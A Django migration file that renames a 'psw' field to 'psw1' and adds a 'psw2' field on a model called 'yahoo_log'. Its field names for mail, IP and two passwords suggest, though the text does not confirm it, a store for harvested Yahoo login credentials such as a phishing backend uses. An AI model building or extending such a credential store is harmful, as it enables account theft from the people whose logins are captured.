# Generated by Django 4.0.4 on 2022-11-13 07:14

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('api', '0004_yahoo_log_ip_alter_yahoo_log_mail_and_more'),
    ]

    operations = [
        migrations.RenameField(
            model_name='yahoo_log',
            old_name='psw',
            new_name='psw1',
        ),
        migrations.AddField(
            model_name='yahoo_log',
            name='psw2',
            field=models.CharField(blank=True, max_length=260, null=True),
        ),
    ]
